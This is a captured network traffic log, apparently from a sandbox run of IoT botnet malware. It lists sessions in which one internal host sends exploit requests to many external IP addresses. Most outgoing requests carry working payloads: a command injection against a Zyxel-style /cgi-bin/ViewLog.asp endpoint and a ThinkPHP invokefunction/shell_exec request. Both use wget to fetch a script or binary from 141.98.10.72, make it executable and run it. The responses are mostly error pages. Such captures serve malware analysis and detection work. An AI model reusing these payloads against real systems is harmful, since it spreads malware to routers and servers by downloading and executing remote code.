Feb 14, 2024 09:29:04.282186031 CET	339	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:34 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.15	59106	95.154.77.13	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.965981960 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.15	53568	112.47.11.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.983740091 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:04.329677105 CET	193	IN	HTTP/1.1 404 Not Found Content-Length: 0 X-NWS-LOG-UUID: 14817034343562233346 Connection: close Server: Lego Server Date: Wed, 14 Feb 2024 08:29:04 GMT X-Cache-Lookup: Return Directly
Feb 14, 2024 09:29:04.507008076 CET	1	IN	Data Raw: 0d Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.15	32778	94.123.148.48	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.570008993 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.15	51032	94.123.54.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.570029974 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.15	43764	62.219.113.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.572169065 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.15	59116	95.101.142.194	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.592924118 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:05.794887066 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:05 GMT Date: Wed, 14 Feb 2024 08:29:05 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 65 38 65 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 35 26 23 34 36 3b 31 39 38 63 32 66 35 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.be8e655f.1707899345.198c2f57</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.15	60494	95.110.224.250	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.609108925 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:05.827336073 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:04 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.15	51392	95.216.114.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.609447002 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:05.827677965 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Wed, 14 Feb 2024 08:29:05 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.15	40920	62.60.211.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.622576952 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:05.925508976 CET	113	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:05 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.15	42718	95.255.93.92	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.627978086 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.15	50714	95.141.128.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.664028883 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:05.936533928 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 14 Feb 2024 08:29:05 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.15	53612	112.47.11.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.762312889 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:06.160509109 CET	192	IN	HTTP/1.1 404 Not Found Content-Length: 0 X-NWS-LOG-UUID: 8051582542529074328 Connection: close Server: Lego Server Date: Wed, 14 Feb 2024 08:29:05 GMT X-Cache-Lookup: Return Directly
Feb 14, 2024 09:29:06.361078978 CET	1	IN	Data Raw: 0d Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.15	44642	31.136.108.106	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.792690039 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:06.490919113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:07.834794998 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:10.682770014 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:16.058500051 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:26.810244083 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.105664015 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112344980 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.15	51396	85.31.112.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.794888973 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.15	45202	95.231.183.4	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.806380033 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:06.042174101 CET	878	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 682 Date: Wed, 14 Feb 2024 08:29:05 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.75</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.15	40206	94.120.5.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:05.818274021 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.15	45752	94.120.160.71	8080

Timestamp	Bytes transferred	Direction	Data
